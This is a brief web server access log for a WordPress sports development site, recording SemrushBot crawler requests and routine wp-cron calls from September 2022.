185.191.171.7 - - [22/Sep/2022:13:34:07 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "jsdsportsdevelopment.org"
10.247.24.58 - - [22/Sep/2022:13:34:13 -0700] "POST /wp-cron.php?doing_wp_cron=1663878853.0090470314025878906250 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663878853.0090470314025878906250" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
185.191.171.33 - - [22/Sep/2022:13:34:09 -0700] "GET /blog/index.php/2018/11/08/thanksgiving-scholarship-fund/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "jsdsportsdevelopment.org"
10.247.24.60 - - [22/Sep/2022:14:09:13 -0700] "POST /wp-cron.php?doing_wp_cron=1663880953.1509740352630615234375 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663880953.1509740352630615234375" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
